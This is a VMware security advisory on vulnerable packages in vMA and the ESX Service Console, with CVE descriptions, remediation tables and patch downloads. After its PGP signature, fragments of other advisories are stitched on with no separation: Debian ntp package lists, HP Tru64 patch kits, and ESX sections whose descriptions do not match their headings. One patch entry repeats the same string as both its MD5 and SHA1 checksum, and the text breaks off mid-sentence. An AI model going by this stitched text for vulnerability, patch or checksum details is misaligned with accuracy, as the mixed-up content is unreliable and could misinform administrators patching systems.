    vMA updates for newt, nfs-util, glib2, kpartx, libvolume-id, device-mapper-multipath, fipscheck, dbus, dbus-libs, ed, openssl, bind, expat, openssh, ntp and kernel packages.

    1. Relevant releases

    VMware ESX 4.0.0 without patch ESX400-201002404-SG, ESX400-201002407-SG, ESX400-201002406-SG

    VMware vMA 4.0 before patch 3

    1. Problem Description

    a. vMA and Service Console update for newt to 0.52.2-12.el5_4.1

    Newt is a programming library for color text mode, widget based
    user interfaces. Newt can be used to add stacked windows, entry
    widgets, checkboxes, radio buttons, labels, plain text fields,
    scrollbars, etc., to text mode user interfaces.
    
    A heap-based buffer overflow flaw was found in the way newt
    processes content that is to be displayed in a text dialog box. 
    A local attacker could issue a specially-crafted text dialog box
    display request (direct or via a custom application), leading to a
    denial of service (application crash) or, potentially, arbitrary
    code execution with the privileges of the user running the
    application using the newt library.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-2905 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not affected
    
    ESX            4.0       ESX      ESX400-201002406-SG
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    b. vMA and Service Console update for vMA package nfs-utils to 1.0.9-42.el5

    The nfs-utils package provides a daemon for the kernel NFS server
    and related tools.
    
    It was discovered that nfs-utils did not use tcp_wrappers
    correctly.  Certain hosts access rules defined in "/etc/hosts.allow"
    and "/etc/hosts.deny" may not have been honored, possibly allowing
    remote attackers to bypass intended access restrictions.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2008-4552 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not affected
    
    ESX            4.0       ESX      ESX400-201002407-SG
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    c. vMA and Service Console package glib2 updated to 2.12.3-4.el5_3.1

    GLib is the low-level core library that forms the basis for projects
    

    such as GTK+ and GNOME. It provides data structure handling for C, portability wrappers, and interfaces for such runtime functionality as an event loop, threads, dynamic loading, and an object system.

    Multiple integer overflows in glib/gbase64.c in GLib before 2.20
    allow context-dependent attackers to execute arbitrary code via a
    long string that is converted either from or to a base64
    representation.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2008-4316 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not affected
    
    ESX            4.0       ESX      ESX400-201002404-SG
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    d. vMA and Service Console update for openssl to 0.9.8e-12.el5

    SSL is a toolkit implementing SSL v2/v3 and TLS protocols with full-
    strength cryptography world-wide.
    
    Multiple denial of service flaws were discovered in OpenSSL's DTLS
    implementation. A remote attacker could use these flaws to cause a
    DTLS server to use excessive amounts of memory, or crash on an
    invalid memory access or NULL pointer dereference.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the names CVE-2009-1377, CVE-2009-1378,
    CVE-2009-1379, CVE-2009-1386, CVE-2009-1387 to these issues.
    
    An input validation flaw was found in the handling of the BMPString
    and UniversalString ASN1 string types in OpenSSL's
    ASN1_STRING_print_ex() function. An attacker could use this flaw to
    create a specially-crafted X.509 certificate that could cause
    applications using the affected function to crash when printing
    certificate contents.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-0590 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not affected
    
    ESX            4.0       ESX      affected, patch pending
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    e. vMA and Service Console package bind updated to 9.3.6-4.P1.el5_4.1

    It was discovered that BIND was incorrectly caching responses
    without performing proper DNSSEC validation, when those responses
    were received during the resolution of a recursive client query
    that requested DNSSEC records but indicated that checking should be
    disabled. A remote attacker could use this flaw to bypass the DNSSEC
    validation check and perform a cache poisoning attack if the target
    BIND server was receiving such client queries.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-4022 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not applicable
    
    ESX            4.0       ESX      affected, patch pending
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    f. vMA and Service Console package expat updated to 1.95.8-8.3.el5_4.2.

    Two buffer over-read flaws were found in the way Expat handled
    malformed UTF-8 sequences when processing XML files. A specially-
    crafted XML file could cause applications using Expat to fail while
    parsing the file.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the names CVE-2009-3560 and CVE-2009-3720 to these
    issues.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not applicable
    
    ESX            4.0       ESX      affected, patch pending
    ESX            3.5       ESX      affected, patch pending
    ESX            3.0.3     ESX      affected, patch pending
    ESX            2.5.5     ESX      affected, patch pending
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    g. vMA and Service Console package openssh update to 4.3p2-36.el5_4.2

    A Red Hat specific patch used in the openssh packages as shipped in
    Red Hat Enterprise Linux 5.4 (RHSA-2009:1287) loosened certain
    ownership requirements for directories used as arguments for the
    ChrootDirectory configuration options. A malicious user that also
    has or previously had non-chroot shell access to a system could
    possibly use this flaw to escalate their privileges and run
    commands as any system user.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-2904 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not applicable
    
    ESX            4.0       ESX      affected, patch pending
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    h. vMA and Service Console package ntp updated to ntp-4.2.2p1-9.el5_4.1.i386.rpm

    A flaw was discovered in the way ntpd handled certain malformed NTP
    packets. ntpd logged information about all such packets and replied
    with an NTP packet that was treated as malformed when received by
    another ntpd.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-3563 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not applicable
    
    ESX            4.0       ESX      affected, patch pending
    ESX            3.5       ESX      affected, patch pending
    ESX            3.0.3     ESX      affected, patch pending
    ESX            2.5.5     ESX      affected, patch pending
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    i. vMA update for package kernel to 2.6.18-164.9.1.el5

    Updated vMA package kernel addresses the security issues listed
    below.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2009-2849 to the security issue fixed in
    kernel 2.6.18-128.2.1
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
    CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
    fixed in kernel 2.6.18-128.6.1
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
    CVE-2009-3726 to the security issues fixed in kernel
    2.6.18-128.9.1
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not affected
    
    ESX            4.0       ESX      affected, patch pending
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3 **
    
    • hosted products are VMware Workstation, Player, ACE, Fusion.

    ** vMA is updated to kernel version 2.6.18-164.9.1

    j. vMA 4.0 updates for the packages kpartx, libvolume-id, device-mapper-multipath, fipscheck, dbus, dbus-libs, and ed

    kpartx updated to 0.4.7-23.el5_3.4, libvolume-id updated to
    095-14.20.el5 device-mapper-multipath package updated to
    0.4.7-23.el5_3.4, fipscheck updated to 1.0.3-1.el5, dbus
    updated to 1.1.2-12.el5, dbus-libs updated to 1.1.2-12.el5,
    and ed package updated to 0.2-39.el5_2.
    
    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the names CVE-2008-3916, CVE-2009-1189 and
    CVE-2009-0115 to these issues.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted *       any       any      not affected
    
    ESXi           any       ESXi     not affected
    
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    vMA            4.0       RHEL5    Patch 3
    
    • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

    • Solution

    Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

    ESX 4.0


    https://hostupdate.vmware.com/software/VUM/OFFLINE/release-192-20100228-732 240/ESX400-201002001.zip md5sum: de62cbccaffa4b2b6831617f18c1ccb4 sha1sum: 4083f191fa4acd6600c9a87e4852f9f5700e91ab http://kb.vmware.com/kb/1018403

    Note: ESX400-201002001 contains the following security bulletins ESX400-201002404-SG, ESX400-201002407-SG, and ESX400-201002406-SG.

    To install an individual bulletin use esxupdate with the -b option. esxupdate --bundle ESX400-201002001.zip -b ESX400-201002404-SG \ -b ESX400-201002407-SG -b ESX400-201002406-SG update

    vMA 4.0


    To update VIMA 1 Log in to VIMA as vi-admin. 2 type 'sudo /usr/sbin/vima-update update' this will apply all currently available updates. See http://tinyurl.com/yfekgrx for more information.

    1. References

    CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2905 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4552 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4316 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2904 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3916 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1189 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0115


    1. Change log

    2010-03-03 VMSA-2010-0004 Initial security advisory after release of bulletins for ESX 4.0 on 2010-03-03 and release of vMA Patch 3 on 2010-02-25.


    1. Contact

    E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

    This Security Advisory is posted to the following lists:

    • security-announce at lists.vmware.com
    • bugtraq at securityfocus.com
    • full-disclosure at lists.grok.org.uk

    E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

    VMware Security Center http://www.vmware.com/security

    VMware security response policy http://www.vmware.com/support/policies/security_response.html

    General support life cycle policy http://www.vmware.com/support/policies/eos.html

    VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

    Copyright 2010 VMware Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8

    wj8DBQFLj1c6S2KysvBH1xkRAnl5AJ9RcHVB7qooSwOPFdVoDFTjohDypgCfZ44O 2z0ICIcntM88ZONMfDNUM6Y= =14fN -----END PGP SIGNATURE----- .

    For the oldstable distribution (etch), this problem has been fixed in version 1:4.2.2.p4+dfsg-2etch4.

    For the stable distribution (lenny), this problem has been fixed in version 1:4.2.4p4+dfsg-8lenny3.

    For the testing (squeeze) and unstable (sid) distribution, this problem will be fixed soon.

    We recommend that you upgrade your ntp packages.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 4.0 alias etch


    Debian (oldstable)


    Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

    Source archives:

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.dsc Size/MD5 checksum: 906 115e93f010e32aa1c90231461487503a http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg.orig.tar.gz Size/MD5 checksum: 2199764 ad746cda2d90dbb9ed06fe164273c5d0 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.diff.gz Size/MD5 checksum: 182632 80aa236bd0a39096c5e5d462c0b9b279

    Architecture independent packages:

    http://security.debian.org/pool/updates/main/n/ntp/ntp-refclock_4.2.2.p4+dfsg-2etch4_all.deb Size/MD5 checksum: 28596 df605f89c08a01116c2ff799777f6a2c http://security.debian.org/pool/updates/main/n/ntp/ntp-simple_4.2.2.p4+dfsg-2etch4_all.deb Size/MD5 checksum: 28594 0c683ac7e7f5b131515f956aed87de3d http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.2.p4+dfsg-2etch4_all.deb Size/MD5 checksum: 912886 1af5a623cbf5f145f34dab7beefcd183

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_alpha.deb Size/MD5 checksum: 408070 ca33235c58a26ad1a839084b4f2d385c http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_alpha.deb Size/MD5 checksum: 65056 e527eb4c93d427c025374805fb5288cb

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_amd64.deb Size/MD5 checksum: 62258 13a4f4faaf699913e421c093e598f2a9 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_amd64.deb Size/MD5 checksum: 359384 1a289aa1f8439e2ef736cbf29bbe140f

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_arm.deb Size/MD5 checksum: 59784 8a84cae4e8f643cbd3ed684e5a7eb0ff http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_arm.deb Size/MD5 checksum: 344316 57066e8abfdf51c36d63600c993f3c20

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_hppa.deb Size/MD5 checksum: 372448 0b8f9b90bb03a2f572066fe8b47c7202 http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_hppa.deb Size/MD5 checksum: 62160 88dc964fa357187ddc97d37513a863ba

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_i386.deb Size/MD5 checksum: 58316 90fc92e7a8f6582ee21076849ae0dfba http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_i386.deb Size/MD5 checksum: 333772 e5fbae24686d444fff118f3ce9cc45db

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_ia64.deb Size/MD5 checksum: 523358 0032e3c9bcb4a27a312a47fb95d1f9a1 http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_ia64.deb Size/MD5 checksum: 74712 72c1b601f4beb41c6c04a54534ba9c51

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mips.deb Size/MD5 checksum: 382868 2980d63a9ca6344e6a76698d0e808f8c http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mips.deb Size/MD5 checksum: 63610 d523930b9b98d6353bf4e6fb7d7e57f5

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mipsel.deb Size/MD5 checksum: 64134 e4042de5af081701911a7cece69c6cce http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mipsel.deb Size/MD5 checksum: 390142 b50dc2bd5970f224b6994c460f8f560a

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_powerpc.deb Size/MD5 checksum: 358860 432b58ad621ac266455f7e5124d2eb1c http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_powerpc.deb Size/MD5 checksum: 61760 2c9dd1b3a8d61bece4f420e533b7a6eb

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_s390.deb Size/MD5 checksum: 350300 40a28748d5016101c179bd4a22c08390 http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_s390.deb Size/MD5 checksum: 61242 14c08344bfd0561ced0d54aa2cd23a2e

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_sparc.deb Size/MD5 checksum: 58584 0e573ef22b1514b12e01fa6ac2bb1ddb http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_sparc.deb Size/MD5 checksum: 332284 4589ff44bc97ad73513d8ba5419c7845

    Debian GNU/Linux 5.0 alias lenny


    Debian (stable)


    Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

    Source archives:

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.dsc Size/MD5 checksum: 1459 81e70fe84f27e3bfabdbfb9f3122492b http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz Size/MD5 checksum: 2835029 dc2b3ac9cc04b0f29df35467514c9884 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.diff.gz Size/MD5 checksum: 300928 b568f39eda3e46f27239ad44021f968c

    Architecture independent packages:

    http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.4p4+dfsg-8lenny3_all.deb Size/MD5 checksum: 927658 8db03976b7b105057ead2da4bae09219

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_alpha.deb Size/MD5 checksum: 66706 9213dcba9a99fa363f0ce48c514a008b http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_alpha.deb Size/MD5 checksum: 538492 de37b288ef933f34446ab78a8d8ed76b

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_amd64.deb Size/MD5 checksum: 63836 a0b5b030abe6a6c32591366febcec1d1 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_amd64.deb Size/MD5 checksum: 479472 277efe45a76a24da6ca14ae581d0a3a2

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_arm.deb Size/MD5 checksum: 61220 d4905eea52795330e517acca903059f4 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_arm.deb Size/MD5 checksum: 448164 cc28e545eb359eba225abfcb02cc4377

    armel architecture (ARM EABI)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_armel.deb Size/MD5 checksum: 62794 e5a43b8076a77643cc742348f0e63de1 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_armel.deb Size/MD5 checksum: 458908 3721b8d7b7a67b31db6249521dd9f015

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_hppa.deb Size/MD5 checksum: 63872 53a7009f1888c06b162c258a9bb5d6fb http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_hppa.deb Size/MD5 checksum: 485744 b8e950ba02a13ecacfe332db56c0c887

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_i386.deb Size/MD5 checksum: 434672 6ccfb060f39cc56f39ef8806865b767d http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_i386.deb Size/MD5 checksum: 60114 2f0914ae2191ddf3f74529bc896299da

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_ia64.deb Size/MD5 checksum: 707812 eb960c732894d56589ba62d76c5ba568 http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_ia64.deb Size/MD5 checksum: 76366 6b5b986e454276661e8b483f095bd16e

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mips.deb Size/MD5 checksum: 64116 ab287c70d2c2daf7b1a8808db8dcedc9 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mips.deb Size/MD5 checksum: 490394 0009cb5333123767dc3afcde682d9e10

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mipsel.deb Size/MD5 checksum: 500786 3b842b738e616f301c31cd025c595235 http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mipsel.deb Size/MD5 checksum: 64776 fd31cdaa7a78d7e3fa072b746dd98e01

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_powerpc.deb Size/MD5 checksum: 490620 21d03b435c327c2884fe587a56fe10fb http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_powerpc.deb Size/MD5 checksum: 65470 6966f71002ae63c104e608af1a7daa3a

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_s390.deb Size/MD5 checksum: 63678 4b143ad2444681bdb1ee44d395996a29 http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_s390.deb Size/MD5 checksum: 474000 6fb44a33381b0d582599eb33896d8f0f

    These files will probably be moved into the stable distribution on its next update.

    Product/Patch kit ITRC Download Location MD5 and SHA1 Checksum

    HP Tru64 UNIX v 5.1B-4 PK6 (BL27) T64KIT1001787-V51BB27-ES-20100817 http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001787-V51BB27-ES-20100817 MD5 results: 2b3a21a96b7855d9ca223f483bd5bfed SHA1 results: ac2221c9d025008b258ac8592a210e16e775fbcf

    HP Tru64 UNIX v 5.1B-5 PK7 (BL28) T64KIT1001786-V51BB28-ES-20100816 http://www13.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001786-V51BB28-ES-20100816 MD5 results: b34d028797577408d565da27d93c30a9 SHA1 results: b34d028797577408d565da27d93c30a9

    Note: The patch kit installation instructions and the Patch Summary and Release Notes documents provide patch kit installation and removal instructions and a summary of each patch. Please read these documents prior to installing patches. HP TCP/IP Services for OpenVMS v5.4, v5.5, v5.6, and v5.7 (only affected by CVE-2009-3563) on Itanium and Alpha platforms. Patch kit installation instructions are provided in the file readme.txt . ESXi userworld update for ntp

    The Network Time Protocol (NTP) is used to synchronize the time of
    a computer client or server to another server or reference time
    source.
    
    A vulnerability was discovered which may allow remote attackers to
    spoof certificates by using MD2 design flaws to generate a hash
    collision in less than brute-force time. NOTE: the scope of this
    issue is currently limited because the amount of computation
    required is still large.
    
    This update also includes security fixes that were first addressed
    in version openssl-0.9.8e-12.el5.i386.rpm.
    
    Kerberos is a network authentication protocol. It is designed to
    provide strong authentication for client/server applications by
    using secret-key cryptography. This update fixes a flaw found in pam_krb5. In
    some non-default configurations (specifically, where pam_krb5 would
    be the first module to prompt for a password), a remote attacker
    could use this flaw to recognize valid usernames, which would aid a
    dictionary-based password guess attack. Service Console package bind updated to 9.3.6-4.P1.el5_4.2
    
    BIND (Berkeley Internet Name Daemon) is by far the most widely used
    Domain Name System (DNS) software on the Internet.
    
    A vulnerability was discovered which could allow remote attacker to
    add the Authenticated Data (AD) flag to a forged NXDOMAIN response
    for an existing domain.
    
    A vulnerability was found in the way that bind handles out-of-
    bailiwick data accompanying a secure response without re-fetching
    from the original source, which could allow remote attackers to
    have an unspecified impact via a crafted response.
    
    NOTE: ESX does not use the BIND name service daemon by default. Service Console package gcc updated to 3.2.3-60
    
    The GNU Compiler Collection includes front ends for C, C++,
    Objective-C, Fortran, Java, and Ada, as well as libraries for these
    languages
    
    GNU Libtool's ltdl.c attempts to open .la library files in the
    current working directory.  This could allow a local user to gain
    privileges via a Trojan horse file.  The GNU C Compiler collection
    (gcc) provided in ESX contains a statically linked version of the
    vulnerable code, and is being replaced. Service Console package sudo updated to 1.6.9p17-6.el5_4
    
    Sudo (su "do") allows a system administrator to delegate authority
    to give certain users (or groups of users) the ability to run some
    (or all) commands as root or another user while providing an audit
    trail of the commands and their arguments.
    
    When a pseudo-command is enabled, sudo permits a match between the
    name of the pseudo-command and the name of an executable file in an
    arbitrary directory, which allows local users to gain privileges
    via a crafted executable file.
    
    When the runas_default option is used, sudo does not properly set
